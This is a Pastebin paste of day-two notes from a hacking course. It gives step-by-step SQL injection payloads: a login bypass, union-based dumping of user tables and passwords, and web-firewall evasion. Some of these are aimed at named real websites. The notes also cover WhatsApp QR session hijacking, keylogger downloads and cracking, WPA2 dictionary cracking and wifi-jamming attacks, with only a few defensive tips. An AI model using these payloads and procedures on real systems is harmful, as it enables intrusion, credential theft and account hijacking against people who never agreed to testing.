API tools faq
paste
Guest User

day2 yoyo

a guest
Sep 17th, 2017
154
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.30 KB | None | 0 0
raw download clone embed print report
  1. Day 2
  2. -----
  3. Web Application Hacking and Security
  4. ------------------------------------
  5. Website: Collecetion of pages is known as website.
  6.  
  7. Types of Websites
  8.  
  9. Static : A Website will have no database inside it hence user can see the content of the website but can not input anything from users's side.
  10.  
  11. For Example: Pure HTML Site.
  12.  
  13. Dynamic : These websites carry database with in hence it has lots of user interaction area's from where user eneters information/data which goes and save in the backend.
  14.  
  15. For Example: facebook,google,twitter,ums etc
  16.  
  17. OWASP TOP 10 Attacks
  18. O : Open
  19. W : web
  20. A : Application
  21. S : Security
  22. P : Project
  23.  
  24. www.owasp.org
  25.  
  26. SQL Injection
  27. -------------
  28. SQL : Structured Query Language
  29.  
  30. DDL : Data Definition Lanaguage
  31.  
  32. DML : Data Manupulation Lang.
  33.  
  34. DCL : Data Control Lang.
  35.  
  36. Attack 1: Authentication Bypass Attack
  37. --------------------------------------
  38. When a hacker tries to bypass the login panel of the website and gain access of the admin panel with all features through which he/she can manupulate the website content.
  39.  
  40. Target : safesecurities.com.pk
  41.  
  42. userid=osama admin
  43. password=bomb admin
  44.  
  45. select * from userstable where userid='osama''or'1'='1 and password='bomb''or'1'='1
  46.  
  47. 'or'1'='1
  48.  
  49. Union Based Injection
  50. ---------------------
  51. DVWA
  52.  
  53. D : Damn
  54. V : Vulnerable
  55. W : Web
  56. A : Application
  57.  
  58. Download : www.dvwa.org
  59.  
  60. Requirements
  61. ------------
  62. 1. XAMPP Server (To make your computer as server)
  63. X : Cross Platform
  64. A : Apache
  65. M : MY-SQL
  66. P : PHP
  67. P : Perl
  68.  
  69.  
  70.  
  71.  
  72.  
  73.  
  74.  
  75.  
  76. Download: apachefriends.org
  77. 2. DVWA :Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
  78.  
  79.  
  80. 3. Copy and paste downloaded files in c:/xampp/htdoc folder
  81.  
  82. 127.0.0.1/dvwa
  83.  
  84. username=admin
  85. password:password
  86.  
  87.  
  88.  
  89. Step 1: Target
  90. http://192.168.235.174/dvwa/vulnerabilities/sqli/
  91.  
  92. Step 2: Find any GET method in the URL of the website
  93.  
  94. GET : www.gmail.com/php?id=10
  95. POST : www.gmail.com/id/
  96. http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
  97.  
  98. Step 3: Check the exception handling
  99. http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#
  100.  
  101. Step 4: Total number of columns from the respective table where id is a column.
  102. http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
  103.  
  104. Step 5: Dump the left 2 columns on the right hand side.
  105. http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#
  106.  
  107.  
  108. Step 6: Get the database and version name
  109. Database->Tables->Columns->Data
  110. http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#
  111.  
  112. Step 7: Get the entire tables of the webiste from the database.
  113. Schema: Database ki MAA.
  114. Tables :information_schema.tables
  115.  
  116. Columns:information_schema.columns
  117.  
  118.  
  119. http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#
  120.  
  121. Target Table Found : users
  122.  
  123. Step 8 : Get the columns of the users table
  124. http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#
  125.  
  126. Step 9 : Get the data from user and password columns
  127. http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select user,password from users--+&Submit=Submit#
  128.  
  129.  
  130. Bypassing Firewall aka Union Based Injection via Web Application Firewall techniques
  131. --------------------------------------------
  132. Target: multan.gov.pk
  133.  
  134. Step 1: FInd GET method in the URL
  135. http://target.com/files.php?id=1
  136.  
  137. Step 2: Check the exception hanlding
  138. http://target.com/files.php?id=1'
  139.  
  140. Step 3: Count the total number of columns
  141. http://target.com/files.php?id=1 order by 3--+
  142.  
  143. Step 4: Dump the columns on the right handside.
  144. http://target.com/files.php?id=1 union select 1,2--+
  145.  
  146. Bypassing Technique 1:
  147. Upper Lower Case
  148. union select
  149. UnIoN sElEcT -> new payload
  150.  
  151. http://target.com/files.php?id=1 UnIoN sElEcT 1,2--+
  152.  
  153.  
  154. Bypassing Technique II:Inline Comments
  155. --------------------------------------
  156. Executable inline comments
  157.  
  158. /*!UnIoN*/ /*!SeLeCt*/
  159.  
  160.  
  161. http://target.com/files.php?id=1 /*!UnIoN*/ /*!SeLeCt*/ 1,2--+
  162.  
  163. Bypassing technique 3: Version Based Inline Executable Comments
  164. http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2--+
  165.  
  166. My-SQL
  167. 1.00.00 : 10000
  168. 2.00.00 :20000
  169. 3.00.00
  170. 4.00.00
  171. 5.00.00 : 50000
  172.  
  173. STep 5: Get the database
  174. http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database()--+
  175.  
  176. Step 6: Get the tables of the database
  177. http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!table_name*/ /*!from*/ /*!information_schema.tables*/--+
  178.  
  179. Target Table : users
  180.  
  181. Step 7: Get the columns
  182. http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!50000GrOuP_cOnCaT(column_name)*/ /*!50000from*/ /*!50000information_schema.columns*/ /*!50000where*/ /*!50000table_name='users'*/--+
  183.  
  184. Step 8: Get the login and password
  185. http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,password from users--+
  186.  
  187. Secure
  188. -------
  189. 1. Do not run waf with default security settings
  190. 2. Keep update on new blacklisted parameters for waf
  191. 3. Make sure you do the custom changes in the WAF as per attack you are getting
  192. 4. Never off the firewall interms of fast response expectation in traffic.
  193. 5. have good validation of received queries and inputs at server level also.
  194.  
  195. Whatsapp Hacking Attack : QRLJACKING
  196. ------------------------------------
  197. Step 1: Download Kali Linux (2.99GB)
  198. kali.org
  199. How to Install and RUn : Watch: https://www.youtube.com/watch?v=3ycEhwrkKYU
  200.  
  201. Step 2: Run and fill the username and password
  202. username: root
  203. password: toor
  204.  
  205. Step 3: Download QRLjacking code from Github
  206. Open Terminal: git clone https://github.com/OWASP/QRLJacking.git
  207.  
  208. Step 4: Open QRLframework folder
  209. Step 5: give permissions to qrljacker.py
  210. chmod +x qrljacker.py
  211. Step 6: Run it in terminal ./QrlJacker.py
  212. Step 7: Select Chat Application -> Whatsapp -> Select Port 1337
  213.  
  214. Step 4: To make this fake whatsapp QR code LIVE on internet.
  215. Download a service AKA: ngrok
  216. https://ngrok.com/download
  217.  
  218. Facebook | Email Hacking Methods
  219. --------------------------------
  220. Family Keylogger : http://www.spyarsenal.com/download.html
  221.  
  222. How to Secure your Email Accounts
  223. ---------------------------------
  224. 1. Always use a pass phrase instead of a password.
  225. 2. Always use a robust password
  226. howsecureismypassword.net
  227.  
  228. checkurcardhackedornot.com
  229. Card no Expiry Date and CVV : Check
  230.  
  231. oncetherewasacrow
  232.  
  233. 3. *&Ig3SimG&*
  234. 4. Active 2 Step Verification in your Gmail.
  235. 5. Facebook: Backupcodes
  236. 6. Always check ur login activites from Gmail to see any unauthorised access.
  237.  
  238. Reverse Engineering | Cracking LIVE
  239. -----------------------------------
  240. Reverse Engineering
  241.  
  242. Engineering : The goal of eng. is to build something.
  243.  
  244. High Level : ENG : C C++ Java Python
  245.  
  246. Middle Level : Assembly : .obj
  247.  
  248. Low Level : Binary : .exe
  249.  
  250. Requirements
  251. --------------
  252. 1. OllyDBG
  253. 2. Perfect Keylogger
  254. 3. Windows Platform
  255.  
  256. Target : http://www.blazingtools.com/downloads.html
  257.  
  258. Wifi Hacking
  259. -------------
  260. Wifi Hacking: Wifi Stands for wireless fidelity. It works on protocol 802.11a onwards. Goal is to provide a wireless connectivty between hosts for data and information transfer and establish a valid communication channel for the same.
  261.  
  262. Types of KEY Security Encryptions
  263. ---------------------------------
  264. 1. WEP : 64bit
  265. 2. WPA : 128bit
  266. 3. WPA-2 PSK <--- Target 256 and above
  267.  
  268. Problem : You cannot brute force the kEY.
  269.  
  270. How to Crack then : Dictionary Based Attack
  271.  
  272. Requirement
  273. -----------
  274. 1. Kali Linux 1.8 version (old)
  275. 2. airmon-ng : This application is a CLI based used to put your wifi device inot monitoring mode and check if its capable of proceeding with the attack.
  276. 3. airodump-ng : This application will help you to dump the air packets and identofy that how many wifi access points are there near by you so that you can select the target to test its security.
  277. 4.macchanger*: This helps you to spoof your wifi adpaters real identity with fake mac address in case you want to do anonymous security testing.
  278. 5. aircrack-ng : This application will help you to crack the key which you extracted while wifi hacking process and will help you to match with the dictionary and if found will show the key.
  279.  
  280.  
  281.  
  282. rahul -->!@#$% --> Mobile
  283.  
  284. Router:rahul->!@#$% <---- !@#$%---rahul
  285.  
  286. Network Attacks : Exploitation
  287. ------------------------------
  288. Active Attack : This attack is mainly concerned with the device direct attack.Hence we get the IP of teh device and then attack on the IP directly, the main goal of this attack is either to gain access to that device or if failed then down the host.
  289.  
  290. Example: Router DDOS Attack, DHCP Starvation Attack with Yersinia and websploit wifi jammer
  291.  
  292. *Requirement : websploit in Kali Linux
  293. Step 1: Open terminal and type websploit
  294.  
  295. Step 2: To see the cli network attacks type show modules
  296.  
  297. Source Tute:https://www.youtube.com/watch?v=I4OPAdE5yv8
  298.  
  299. Source Article: http://www.hackingtutorials.org/metasploit-tutorials/websploit-wifi-jammer/
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!